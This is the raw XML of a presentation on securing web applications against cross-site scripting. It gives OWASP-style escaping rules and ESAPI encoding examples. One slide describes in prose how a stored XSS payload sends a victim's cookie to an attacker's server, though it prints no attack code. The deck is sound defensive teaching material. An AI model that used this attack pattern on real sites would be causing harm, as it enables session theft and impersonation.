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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/12/2017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7CE7CE3-61C5-4466-91C8-DD17B84470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A1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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A1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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A1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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A1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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CE7CE3-61C5-4466-91C8-DD17B84470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A1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/12/2017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1C1DA-0DC2-4D58-A5E2-062E84D51AEF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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CE7CE3-61C5-4466-91C8-DD17B84470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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}"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7CE7CE3-61C5-4466-91C8-DD17B8447039}"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AA1C1DA-0DC2-4D58-A5E2-062E84D51AEF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/12/2017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7CE7CE3-61C5-4466-91C8-DD17B8447039}"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mganss/HtmlSanitiz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owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.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Securing the Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Appication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Waqar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yar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anatomy of a Cross-site Scripting attack</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attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim requests the web page from the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.</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How to prevent XSS.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Never Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Element Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into JavaScript Data Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSS Escape And Strictly Validate Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Style Property Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML URL Parameter Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitize HTML Markup with a Library Designed for the Job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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Never Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data Except in Allowed Locations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The first rule is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>deny all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - don't put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into your HTML document </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> There are so many strange contexts within HTML that the list of escaping rules gets very complicated. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can't think of any good reason to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data in these contexts. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This includes "nested contexts" like a URL inside a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -- the encoding rules for those locations are tricky and dangerous. If you insist on putting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into nested contexts, please do a lot of cross-browser testing and let us know what you find out.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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt; directly in a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--&gt; inside an HTML comment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=test /&gt; in an attribute name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="/test" /&gt; in a tag name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;style&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/style&gt; directly in CSS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Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Element Content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when you want to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data directly into the HTML body somewhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This includes inside normal tags like div, p, b, td, etc. Most web frameworks have a method for HTML escaping for the characters detailed below. However, this is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>absolutely not sufficient for other HTML contexts.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> You need to implement the other rules detailed here as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Escape the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. In addition to the 5 characters significant in XML (&amp;, &lt;, &gt;, ", '), the forward slash is included as it helps to end an HTML entity.</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Escape HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp; --&gt; &amp;amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' --&gt; &amp;#x27;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ --&gt; &amp;#x2F;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String safe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeForHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( "input" )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Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For putting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into typical attribute values like width, name, value, etc. This should not be used for complex attributes like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, style, or any of the event handlers like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;content&lt;/div&gt; inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UNquoted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attribute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;content&lt;/div&gt; inside single quoted attribute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;content&lt;/div&gt; inside double quoted attribute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Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the &amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; format (or a named entity if available) to prevent switching out of the attribute. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The reason this rule is so broad is that developers frequently leave attributes unquoted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Properly quoted attributes can only be escaped with the corresponding quote. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; &lt; = &gt; ^ and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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Attirbutes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1935480"/>
            <a:ext cx="8686800" cy="4389120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String safe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeForHTMLAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( "input" )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Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into JavaScript Data Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This rule concerns dynamically generated JavaScript code - both script blocks and event-handler attributes. The only safe place to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into this code is inside a quoted "data value." </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data inside any other JavaScript context is quite dangerous, as it is extremely easy to switch into an execution context with characters including (but not limited to) semi-colon, equals, space, plus, and many more, so use with caution.</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US" dirty="0" smtClean="0"/>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1935480"/>
            <a:ext cx="8229600" cy="3474720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user input within the output it generates.</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JavaScript Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into JavaScript Data Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
